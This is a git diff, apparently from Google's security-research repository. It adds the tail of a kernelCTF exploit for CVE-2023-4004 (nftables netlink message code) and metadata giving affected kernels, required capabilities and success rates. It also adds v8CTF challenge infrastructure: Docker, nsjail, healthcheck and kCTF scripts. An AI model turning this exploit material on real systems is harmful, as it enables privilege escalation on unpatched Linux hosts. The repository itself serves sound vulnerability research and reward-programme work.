TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_TABLE_NAME, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/metadata.json new file mode 100644 index 00000000..dcbf5b6c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/metadata.json @@ -0,0 +1,51 @@ +{ + "$schema":"https://google.github.io/security-research/kernelctf/metadata.schema.v2.json", + "submission_ids":[ + "exp73" + ], + "vulnerability":{ + "patch_commit":"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=87b5a5c209405cb6b57424cdfa226a6dbd349232", + "cve":"CVE-2023-4004", + "affected_versions":[ + "5.6-rc1 - 6.5" + ], + "requirements":{ + "attack_surface":[ + + ], + "capabilities":[ + "CAP_NET_ADMIN" + ], + "kernel_config":[ + "CONFIG_NETFILTER", + "CONFIG_NF_TABLES" + ] + } + }, + "exploits":[ + { + "environment":"lts-6.1.36", + "uses":[ + "userns" + ], + "requires_seperate_kaslr_leak":false, + "stability_notes":"3 ~ 4 times success per 10 times run" + }, + { + "environment":"cos-105-17412.101.17", + "uses":[ + "userns" + ], + "requires_seperate_kaslr_leak":false, + "stability_notes":"3 ~ 4 times success per 10 times run" + }, + { + "environment":"mitigation-6.1", + "uses":[ + "userns" + ], + "requires_seperate_kaslr_leak":false, + "stability_notes":"3 ~ 4 times success per 10 times run" + } + ] + } diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/original.tar.gz new file mode 100644 index 00000000..b941340f Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/original.tar.gz differ diff --git a/pocs/linux/kvmctf/README.md b/pocs/linux/kvmctf/README.md new file mode 100644 index 00000000..15db30cd --- /dev/null +++ b/pocs/linux/kvmctf/README.md @@ -0,0 +1 @@ +Add your kvmCTF exploit PRs to this folder as per the kvmCTF [rules of submission](https://google.github.io/security-research/kvmctf/rules.md) diff --git a/v8ctf/README.md b/v8ctf/README.md new file mode 100644 index 00000000..7917e03c --- /dev/null +++ b/v8ctf/README.md @@ -0,0 +1,13 @@ +# v8CTF challenge + +This challenge is part of the v8CTF, an exploit VRP for the v8 JavaScript engine. + +See RULES.md for how to participate. + +You can reach it at `nc v8.ctfcompetition.com 1337`. + +It runs a `chrome --headless=new` on a user-provided URL. You can find the command line in chrome/challenge/chal and the Chrome version in chrome/challenge/Dockerfile. + +The flag is at /flag/flag and is in the format `v8CTF{.*}`. + +If you want to recreate the environment locally, check out https://google.github.io/kctf/ for tips on how to use the kCTF infrastructure. diff --git a/v8ctf/chrome/README.md b/v8ctf/chrome/README.md new file mode 100644 index 00000000..44415f63 --- /dev/null +++ b/v8ctf/chrome/README.md @@ -0,0 +1,55 @@ +# Quickstart guide to writing a challenge + +The basic steps when preparing a challenge are: + +* A Docker image is built from the `challenge` directory. For the simplest challenges, replacing `challenge/chal.c` is sufficient. +* Edit `challenge/Dockerfile` to change the commandline or the files you want to include. +* To try the challenge locally, you will need to + * create a a local cluster with `kctf cluster create --type kind --start $configname` + * build the challenge binary with `make -C challenge` + * and then deploy the challenge with `kctf chal start` +* To access the challenge, create a port forward with `kctf chal debug port-forward` and connect to it via `nc localhost PORT` using the printed port. +* Check out `kctf chal ` for more commands. + +## Directory layout + +The following files/directories are available: + +### /challenge.yaml + +`challenge.yaml` is the main configuration file. You can use it to change +settings like the name and namespace of the challenge, the exposed ports, the +proof-of-work difficulty etc. +For documentation on the available fields, you can run `kubectl explain challenge` and +`kubectl explain challenge.spec`. + +### /challenge + +The `challenge` directory contains a Dockerfile that describes the challenge and +any challenge files. This template comes with a Makefile to build the challenge, +which is the recommended way for pwnables if the deployed binary matters, e.g. +if you hand it out as an attachment for ROP gadgets. +If the binary layout doesn't matter, you can build it using an intermediate +container as part of the Dockerfile similar to how the chroot is created. + +### /healthcheck + +The `healthcheck` directory is optional. If you don't want to write a healthcheck, feel free to delete it. However, we strongly recommend that you implement a healthcheck :). + +We provide a basic healthcheck skeleton that uses pwntools to implement the +healthcheck code. The only requirement is that the healthcheck replies to GET +requests to http://$host:45281/healthz with either a success or an error status +code. + +In most cases, you will only have to modify `healthcheck/healthcheck.py`. + +## API contract + +Ensure your setup fulfills the following requirements to ensure it works with kCTF: + +* Verify `kctf_setup` is used as the first command in the CMD instruction of your `challenge/Dockerfile`. +* You can do pretty much whatever you want in the `challenge` directory but: +* We strongly recommend using nsjail in all challenges. While nsjail is already installed, you need to configure it in `challenge/nsjail.cfg`. For more information on nsjail, see the [official website](https://nsjail.dev/). +* Your challenge receives connections on port 1337. The port can be changed in `challenge.yaml`. +* The healthcheck directory is optional. + * If it exists, the image should run a webserver on port 45281 and respond to `/healthz` requests. diff --git a/v8ctf/chrome/challenge.yaml b/v8ctf/chrome/challenge.yaml new file mode 100644 index 00000000..558ba3ad --- /dev/null +++ b/v8ctf/chrome/challenge.yaml @@ -0,0 +1,27 @@ +apiVersion: kctf.dev/v1 +kind: Challenge +metadata: + name: chrome +spec: + deployed: true + powDifficultySeconds: 1 + network: + public: true + healthcheck: + # TIP: disable the healthcheck during development + enabled: true + podTemplate: + template: + spec: + containers: + - name: challenge + volumeMounts: + - name: flag + mountPath: /chroot/flag + readOnly: true + volumes: + - name: flag + secret: + defaultMode: 0555 + secretName: v8ctf-flag + optional: true diff --git a/v8ctf/chrome/challenge/Dockerfile b/v8ctf/chrome/challenge/Dockerfile new file mode 100644 index 00000000..18b09afe --- /dev/null +++ b/v8ctf/chrome/challenge/Dockerfile @@ -0,0 +1,56 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +FROM ubuntu:22.04 as chroot + +RUN /usr/sbin/useradd --no-create-home -u 1000 user + +RUN apt-get update && apt-get install -y gnupg2 wget + +# Install latest chrome dev package and fonts to support major charsets (Chinese, Japanese, Arabic, Hebrew, Thai and a few others) +# Note: this installs the necessary libs to make the bundled version of Chromium that Puppeteer installs, work. +# Deps from https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md#chrome-headless-doesnt-launch-on-unix +# plus libxshmfence1 which seems to be missing +RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \ + && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \ + && apt-get update \ + && DEBIAN_FRONTEND=noninteractive apt-get install -yq --no-install-recommends \ + google-chrome-stable \ + && rm -rf /var/lib/apt/lists/* + +RUN apt-get update && apt-get install -y unzip + +RUN mkdir /home/user +# This version is to be released on 2023-11-06 +RUN wget 'https://edgedl.me.gvt1.com/edgedl/chrome/chrome-for-testing/118.0.5993.70/linux64/chrome-linux64.zip' -O /home/user/chrome-linux.zip +RUN cd /home/user && unzip chrome-linux.zip && rm chrome-linux.zip + +COPY chal /home/user/ + +FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f + +COPY --from=chroot / /chroot +RUN mkdir /chroot/dev/shm +RUN touch /chroot/dev/null +RUN touch /chroot/dev/zero +RUN touch /chroot/dev/urandom + +RUN mkdir /chroot/run/dbus + +COPY nsjail.cfg /home/user/ + +CMD kctf_setup && \ + kctf_drop_privs \ + socat \ + TCP-LISTEN:1337,reuseaddr,fork \ + EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /home/user/chal",stderr diff --git a/v8ctf/chrome/challenge/chal b/v8ctf/chrome/challenge/chal new file mode 100755 index 00000000..a2c7f981 --- /dev/null +++ b/v8ctf/chrome/challenge/chal @@ -0,0 +1,15 @@ +#!/usr/bin/bash + +CHROME=/home/user/chrome-linux64/chrome + +echo "Version: $($CHROME --version | head -n1)" +echo "Please send me a URL to open." +read -r url +if ! echo $url | grep -E '^https?://[A-Za-z0-9.:/?%\-_+&=]*$' -q; then + echo 'url regex fail' + exit 1 +fi + +export HOME=/tmp +dbus-daemon --system +dbus-run-session -- $CHROME --headless=new --no-sandbox --disable-crashpad --disable-breakpad --disable-crash-reporter --user-data-dir=/tmp/chrome-userdata --enable-logging=stderr "${url}" diff --git a/v8ctf/chrome/challenge/nsjail.cfg b/v8ctf/chrome/challenge/nsjail.cfg new file mode 100644 index 00000000..b2d96e8f --- /dev/null +++ b/v8ctf/chrome/challenge/nsjail.cfg @@ -0,0 +1,64 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# See options available at https://github.com/google/nsjail/blob/master/config.proto + +name: "default-nsjail-configuration" +description: "Default nsjail configuration for pwnable-style CTF task." + +mode: ONCE +uidmap {inside_id: "1000"} +gidmap {inside_id: "1000"} +disable_rl: true +clone_newnet: false + +cwd: "/home/user" + +mount: [ + { + src: "/chroot" + dst: "/" + is_bind: true + }, + { + src: "/dev" + dst: "/dev" + is_bind: true + }, + { + dst: "/tmp" + fstype: "tmpfs" + rw: true + }, + { + dst: "/run/dbus" + fstype: "tmpfs" + rw: true + }, + { + dst: "/run/user" + fstype: "tmpfs" + rw: true + }, + { + dst: "/proc" + fstype: "proc" + rw: true + }, + { + src: "/etc/resolv.conf" + dst: "/etc/resolv.conf" + is_bind: true + } +] diff --git a/v8ctf/chrome/healthcheck/Dockerfile b/v8ctf/chrome/healthcheck/Dockerfile new file mode 100644 index 00000000..2df56306 --- /dev/null +++ b/v8ctf/chrome/healthcheck/Dockerfile @@ -0,0 +1,18 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +FROM gcr.io/kctf-docker/healthcheck@sha256:6709709a8cfd6e2d743c86d58398c00ca4eb26befd3b1a0a629ab35f91e98ef0 + +COPY healthcheck_loop.sh healthcheck.py healthz_webserver.py /home/user/ + +CMD kctf_drop_privs /home/user/healthcheck_loop.sh & /home/user/healthz_webserver.py diff --git a/v8ctf/chrome/healthcheck/README.md b/v8ctf/chrome/healthcheck/README.md new file mode 100644 index 00000000..8dbcd6a8 --- /dev/null +++ b/v8ctf/chrome/healthcheck/README.md @@ -0,0 +1,14 @@ +# Healthcheck + +kCTF checks the health of challenges by accessing the healthcheck via +http://host:45281/healthz which needs to return either 200 ok or an error +depending on the status of the challenge. + +The default healthcheck consists of: +* a loop that repeatedly calls a python script and writes the status to a file +* a webserver that checks the file and serves /healthz +* the actual healthcheck code using pwntools for convenience + +To modify it, you will likely only have to change the script in healthcheck.py. +You can test if the challenge replies as expected or better add a full example +solution that will try to get the flag from the challenge. diff --git a/v8ctf/chrome/healthcheck/healthcheck.py b/v8ctf/chrome/healthcheck/healthcheck.py new file mode 100755 index 00000000..0a25bd22 --- /dev/null +++ b/v8ctf/chrome/healthcheck/healthcheck.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import socket +from pwn import * + +def handle_pow(r): + print(r.recvuntil(b'python3 ')) + print(r.recvuntil(b' solve ')) + challenge = r.recvline().decode('ascii').strip() + p = process(['kctf_bypass_pow', challenge]) + solution = p.readall().strip() + r.sendline(solution) + print(r.recvuntil(b'Correct\n')) + +r = remote('127.0.0.1', 1337) +print(r.recvuntil('== proof-of-work: ')) +if r.recvline().startswith(b'enabled'): + handle_pow(r) + +l = listen() + +r.readuntil(b'URL to open.', timeout=10) +r.sendline(bytes('http://localhost:{}/ok'.format(l.lport), 'ascii')) + +_ = l.wait_for_connection() + +l.readuntil(b'GET /ok HTTP/1.1') +l.send(b'HTTP/1.1 200 OK\nContent-Length: 0\n\n') + +exit(0) diff --git a/v8ctf/chrome/healthcheck/healthcheck_loop.sh b/v8ctf/chrome/healthcheck/healthcheck_loop.sh new file mode 100755 index 00000000..acf69158 --- /dev/null +++ b/v8ctf/chrome/healthcheck/healthcheck_loop.sh @@ -0,0 +1,32 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +set -Eeuo pipefail + +TIMEOUT=20 +PERIOD=30 + +export TERM=linux +export TERMINFO=/etc/terminfo + +while true; do + echo -n "[$(date)] " + if timeout "${TIMEOUT}" /home/user/healthcheck.py; then + echo 'ok' | tee /tmp/healthz + else + echo -n "$? " + echo 'err' | tee /tmp/healthz + fi + sleep "${PERIOD}" +done diff --git a/v8ctf/chrome/healthcheck/healthz_webserver.py b/v8ctf/chrome/healthcheck/healthz_webserver.py new file mode 100755 index 00000000..62cf0198 --- /dev/null +++ b/v8ctf/chrome/healthcheck/healthz_webserver.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import http.server + +class HealthzHandler(http.server.BaseHTTPRequestHandler): + def do_GET(self): + if self.path != '/healthz': + self.send_response(404) + self.send_header("Content-length", "0") + self.end_headers() + return + + content = b'err' + try: + with open('/tmp/healthz', 'rb') as fd: + content = fd.read().strip() + except: + pass + self.send_response(200 if content == b'ok' else 400) + self.send_header("Content-type", "text/plain") + self.send_header("Content-length", str(len(content))) + self.end_headers() + self.wfile.write(content) + +httpd = http.server.HTTPServer(('', 45281), HealthzHandler) +httpd.serve_forever() diff --git a/v8ctf/kctf/VERSION b/v8ctf/kctf/VERSION new file mode 100644 index 00000000..f8a696c8 --- /dev/null +++ b/v8ctf/kctf/VERSION @@ -0,0 +1 @@ +1.7.2 diff --git a/v8ctf/kctf/activate b/v8ctf/kctf/activate new file mode 100644 index 00000000..6f189c80 --- /dev/null +++ b/v8ctf/kctf/activate @@ -0,0 +1,309 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +if [[ "$OSTYPE" =~ ^darwin.* ]]; then + KCTF_YQ_URL="https://github.com/mikefarah/yq/releases/download/v4.2.0/yq_darwin_amd64" + KCTF_YQ_HASH="83b9dc96e75799e162035b2ee2dffc0c51de869c27a2e294eb0aee8653a19804" + + KCTF_KIND_URL="https://kind.sigs.k8s.io/dl/v0.11.1/kind-darwin-amd64" + KCTF_KIND_HASH="432bef555a70e9360b44661c759658265b9eaaf7f75f1beec4c4d1e6bbf97ce3" + + KCTF_KUBECTL_URL="https://dl.k8s.io/release/v1.20.4/bin/darwin/amd64/kubectl" + KCTF_KUBECTL_HASH="37f593731b8c9913bf2a3bfa36dacb3058dc176c7aeae2930c783822ea03a573" + + STAT="gstat" + MKTEMP="gmktemp" + + script_dir="$(dirname "${BASH_SOURCE-$0}")" + if [[ "$script_dir" == "." ]]; then + script_dir="../." + fi + export KCTF_CTF_DIR="$(realpath "$(dirname "${script_dir}")")" + unset script_dir +else + KCTF_YQ_URL="https://github.com/mikefarah/yq/releases/download/v4.2.0/yq_linux_amd64" + KCTF_YQ_HASH="5d44bd64e264e9029c5f06bcd960ba162d7ed7ddd1781f02a28d62f50577b632" + + KCTF_KIND_URL="https://kind.sigs.k8s.io/dl/v0.11.1/kind-linux-amd64" + KCTF_KIND_HASH="949f81b3c30ca03a3d4effdecda04f100fa3edc07a28b19400f72ede7c5f0491" + + KCTF_KUBECTL_URL="https://dl.k8s.io/release/v1.20.4/bin/linux/amd64/kubectl" + KCTF_KUBECTL_HASH="98e8aea149b00f653beeb53d4bd27edda9e73b48fed156c4a0aa1dabe4b1794c" + + STAT="stat" + MKTEMP="mktemp" + export KCTF_CTF_DIR="$(realpath --no-symlinks "$(dirname "${BASH_SOURCE-$0}")/..")" +fi + +export KCTF_BIN="${KCTF_CTF_DIR}/kctf/bin" +source "${KCTF_BIN}/kctf-log" + +function _kctf_check_umask { + if [[ $((8#$(umask) & 8#755)) -ne 0 ]]; then + _kctf_log_err "umask is too prohibitive. Please set it to 022 when using kctf" + return 1 + fi + if [[ "$(${STAT} "${KCTF_BIN}/kctf-cluster" --format '%a')" -ne "755" ]]; then + _kctf_log_err "${KCTF_BIN}/kctf-cluster has unexpected permissions. Maybe a umask problem during checkout?" + return 1 + fi +} + +function _kctf_setup_environment { + KCTF_CONFIG_DIR="$(${MKTEMP} -d --tmpdir kctf.XXXXXXXXXX)" + if [[ $? -ne 0 ]]; then + return 1 + fi + export KCTF_CTF_NAME=$(basename "${KCTF_CTF_DIR}") + export KCTF_SESSION="$(dd if=/dev/urandom bs=1 count=10 2>/dev/null | xxd -ps -c 10)" + + export KUBECONFIG="${KCTF_CONFIG_DIR}/kube.conf" +} + +function _kctf_download_dependencies { + if [[ ! -x "${KCTF_BIN}/yq" ]]; then + if [[ -e "${KCTF_BIN}/yq" ]]; then + rm "${KCTF_BIN}/yq" >/dev/null + fi + wget "${KCTF_YQ_URL}" -O "${KCTF_BIN}/yq" --quiet || return 1 + sha256sum --status -c <(echo "${KCTF_YQ_HASH} ${KCTF_BIN}/yq") || return 1 + chmod u+x "${KCTF_BIN}/yq" + fi + + if [[ ! -x "${KCTF_BIN}/kind" ]] || ! sha256sum --status -c <(echo "${KCTF_KIND_HASH} ${KCTF_BIN}/kind"); then + rm "${KCTF_BIN}/kind" >/dev/null 2>/dev/null || true + curl -Lo "${KCTF_BIN}/kind" "${KCTF_KIND_URL}" || return 1 + sha256sum --status -c <(echo "${KCTF_KIND_HASH} ${KCTF_BIN}/kind") || return 1 + chmod u+x "${KCTF_BIN}/kind" + fi + alias "kind=${KCTF_BIN}/kind" + + if [[ ! -x "${KCTF_BIN}/kubectl" ]]; then + curl -Lo "${KCTF_BIN}/kubectl" "${KCTF_KUBECTL_URL}" || return 1 + sha256sum --status -c <(echo "${KCTF_KUBECTL_HASH} ${KCTF_BIN}/kubectl") || return 1 + chmod u+x "${KCTF_BIN}/kubectl" + fi + alias "kubectl=${KCTF_BIN}/kubectl" +} + +function _kctf_cleanup { + if command -v gcloud >/dev/null 2>&1; then + unset CLOUDSDK_ACTIVE_CONFIG_NAME + # regenerate this name in case the user changed the variable + GCLOUD_CONFIG_NAME="kctf-${KCTF_SESSION}" + if gcloud config configurations describe "${GCLOUD_CONFIG_NAME}" >/dev/null 2>&1; then + echo "Deleting gcloud config ${GCLOUD_CONFIG_NAME}" + CLOUDSDK_CORE_DISABLE_PROMPTS=1 gcloud config configurations delete "${GCLOUD_CONFIG_NAME}" + fi + fi + # regenerate this name in case the user changed the variable + KUBE_CONFIG_NAME="${KCTF_CONFIG_DIR}/kube-${KCTF_SESSION}.conf" + if [[ -e "${KUBE_CONFIG_NAME}" ]]; then + rm "${KUBE_CONFIG_NAME}" >/dev/null + fi +} + +function _kctf_usage { + echo -e "usage: kctf command subcommand [args]" >&2 + echo -e "available commands:" >&2 + echo -e " chal: commands for challenges (creating, deploying, etc.)" >&2 + echo -e " cluster: commands for clusters (creating, managing, etc.) " >&2 +} + +# Implemented as a function so that we can set environment variables where needed +function kctf { + if [[ $# -lt 1 ]]; then + _kctf_log_err "missing required argument" + _kctf_usage + return 1 + fi + case "$1" in + -h|--help) + _kctf_usage + return 0 + ;; + chal) + _kctf_set_active_challenge + shift + "${KCTF_CTF_DIR}/kctf/bin/kctf-challenge" $@ + ret=$? + if [[ $ret -ne 0 ]]; then + _kctf_log_err "command returned $ret" + fi + return $ret + ;; + cluster) + shift + if [[ "$1" == "create" ]] || [[ "$1" == "load" ]]; then + CONFIG_NAME=$("${KCTF_CTF_DIR}/kctf/bin/kctf-cluster" $@) + if [[ $? -ne 0 ]]; then + return 1 + fi + if [[ -z "${CONFIG_NAME}" ]]; then + return 0 + fi + source "${KCTF_CTF_DIR}/kctf/config/${CONFIG_NAME}" + export CLUSTER_TYPE + export PROJECT + export ZONE + export REGISTRY + export CLUSTER_NAME + export DOMAIN_NAME + export EMAIL_ADDRESS + if [[ "${CLUSTER_TYPE}" == "gce" ]]; then + export CLOUDSDK_ACTIVE_CONFIG_NAME="kctf-${KCTF_SESSION}" + fi + KCTF_CONFIG="${CONFIG_NAME}" + else + "${KCTF_CTF_DIR}/kctf/bin/kctf-cluster" $@ + fi + ret=$? + if [[ $ret -ne 0 ]]; then + _kctf_log_err "command returned $ret" + fi + return $ret + ;; + *) + _kctf_usage + return 1 + ;; + esac +} + +function _kctf_enable_completion { + source "${KCTF_BIN}/kctf-completion" +} + +function _kctf_error_cleanup { + unset -f _kctf_download_dependencies + # don't unset _kctf_cleanup since it's used in a trap below + #unset -f _kctf_cleanup + unset -f _kctf_usage + unset -f _kctf_error_cleanup + unset -f _kctf_enable_completion + unset -f _kctf_set_active_challenge + unset -f _kctf_setup_environment + unset -f _kctf_check_umask + unset -f _kctf_activate + unset -f _kctf_chal_string + unset -f _kctf_log + unset -f _kctf_log_err + unset -f kctf + unset -f deactivate + + unset KCTF_CONFIG + unset KCTF_CONFIG_DIR + unset KCTF_CTF_DIR + unset KCTF_CTF_NAME + unset KCTF_BIN + unset KCTF_SESSION + unset KCTF_YQ_URL + unset KCTF_YQ_HASH + unset KUBECONFIG + unset CHALLENGE_NAMESPACE + unset CHALLENGE_NAME + unset CHALLENGE_DIR + + unset _KCTF_PROMPT_COLOR1 + unset _KCTF_PROMPT_COLOR2 + unset _KCTF_PROMPT_COLOR_END + + unset CLUSTER_TYPE + unset PROJECT + unset ZONE + unset REGISTRY + unset CLUSTER_NAME + unset DOMAIN_NAME + unset EMAIL_ADDRESS +} + +function _kctf_set_active_challenge { + current_dir="${PWD}" + while [[ "${current_dir}" == "${KCTF_CTF_DIR}"/* ]]; do + if [[ -e "${current_dir}/challenge.yaml" ]]; then + CHALLENGE_NAME=$("${KCTF_BIN}/yq" eval --exit-status 'select(.kind == "Challenge") | .metadata.name' "${current_dir}/challenge.yaml" 2>/dev/null) + if [[ $? -ne 0 ]]; then + unset CHALLENGE_NAME + fi + CHALLENGE_NAMESPACE="default" + if "${KCTF_BIN}/yq" eval --exit-status 'select(.kind == "Challenge") | .metadata.namespace' "${current_dir}/challenge.yaml" >/dev/null 2>/dev/null; then + CHALLENGE_NAMESPACE=$("${KCTF_BIN}/yq" eval 'select(.kind == "Challenge") | .metadata.namespace' "${current_dir}/challenge.yaml" 2>/dev/null) + fi + export CHALLENGE_DIR="${current_dir}" + export CHALLENGE_NAME + export CHALLENGE_NAMESPACE + return 0 + fi + current_dir="$(dirname ${current_dir})" + done + unset CHALLENGE_NAME +} + +if [[ -n "${ZSH_VERSION:-}" ]]; then + _KCTF_PROMPT_COLOR1=$'%F{green}' + _KCTF_PROMPT_COLOR2=$'%F{cyan}' + _KCTF_PROMPT_COLOR_END=$'%f' +else + _KCTF_PROMPT_COLOR1=$'\001\e[0;32m\002' + _KCTF_PROMPT_COLOR2=$'\001\e[0;36m\002' + _KCTF_PROMPT_COLOR_END=$'\001\e[0m\002' +fi + +function _kctf_config_string { + if [ ! -z "${KCTF_CONFIG}" ]; then + echo "${_KCTF_PROMPT_COLOR1},config=${_KCTF_PROMPT_COLOR2}${KCTF_CONFIG}" + fi +} + +function _kctf_chal_string { + _kctf_set_active_challenge + if [ ! -z "${CHALLENGE_NAME}" ]; then + echo "${_KCTF_PROMPT_COLOR1},chal=${_KCTF_PROMPT_COLOR2}${CHALLENGE_NAME}" + fi +} + +function _kctf_activate { + _kctf_check_umask || return 1 + + if ! _kctf_setup_environment; then + _kctf_log_err 'error setting up the environment' + return 1 + fi + if ! _kctf_download_dependencies; then + _kctf_log_err 'error downloading dependencies' + return 1 + fi + _kctf_enable_completion || echo "loading shell completion failed" >&2 + SAVED_PS1="${PS1}" + _kctf_log "kCTF environment activated. Run \"deactivate\" to exit." + if kctf cluster load .lastconfig >/dev/null 2>/dev/null; then + _kctf_log "automatically loaded last config" + else + _kctf_log "To create a cluster config, run \"kctf cluster create\"" + fi + PS1="${PS1}${_KCTF_PROMPT_COLOR1}kCTF[ctf=${_KCTF_PROMPT_COLOR2}${KCTF_CTF_NAME}\$(_kctf_config_string)\$(_kctf_chal_string)${_KCTF_PROMPT_COLOR1}] >${_KCTF_PROMPT_COLOR_END} " +} + +function deactivate { + _kctf_cleanup + _kctf_error_cleanup + PS1="${SAVED_PS1}" + unset SAVED_PS1 +} + +if _kctf_activate; then + trap _kctf_cleanup EXIT +else + _kctf_error_cleanup +fi diff --git a/v8ctf/kctf/bin/kctf-challenge b/v8ctf/kctf/bin/kctf-challenge new file mode 100755 index 00000000..15f32934 --- /dev/null +++ b/v8ctf/kctf/bin/kctf-challenge @@ -0,0 +1,634 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +source "${KCTF_BIN}/kctf-log" + +if [[ "$OSTYPE" =~ ^darwin.* ]]; then + GETOPT="$(brew --prefix gnu-getopt)/bin/getopt" +else + GETOPT="getopt" +fi + +function has_cluster_config { + [[ ! -z "${CLUSTER_NAME-}" ]] +} + +function require_cluster_config { + if ! has_cluster_config; then + _kctf_log_err "No config loaded. You need to run \"kctf cluster\" first." + exit 1 + fi +} + +function require_active_challenge { + if [[ -z "${CHALLENGE_DIR-}" ]]; then + _kctf_log_err "No active challenge, please cd to a challenge directory first." + exit 1 + fi +} + +function parse_help_arg_only_usage { + echo -e "usage: kctf chal ${COMMAND} [args]" >&2 + echo -e "" >&2 + echo -e "${DESCRIPTION}" >&2 + echo -e "" >&2 + echo -e "Args:" >&2 + echo -e " -h|--help print this help" >&2 +} + +function parse_help_arg_only { + OPTS="h" + LONGOPTS="help" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal ${COMMAND}" -- "$@") + if [[ $? -ne 0 ]]; then + parse_help_arg_only_usage + exit 1 + fi + eval set -- "$PARSED" + + while true; do + case "$1" in + -h|--help) + parse_help_arg_only_usage + exit 0 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + parse_help_arg_only_usage + exit 1 + ;; + esac + done + + require_active_challenge +} + +function parse_container_name_usage { + echo -e "usage: kctf chal ${COMMAND} [args]" >&2 + echo -e " -h|--help print this help" >&2 + echo -e " --container name of the container to interact with, e.g. challenge (default) or healthcheck" >&2 +} + +function parse_container_name { 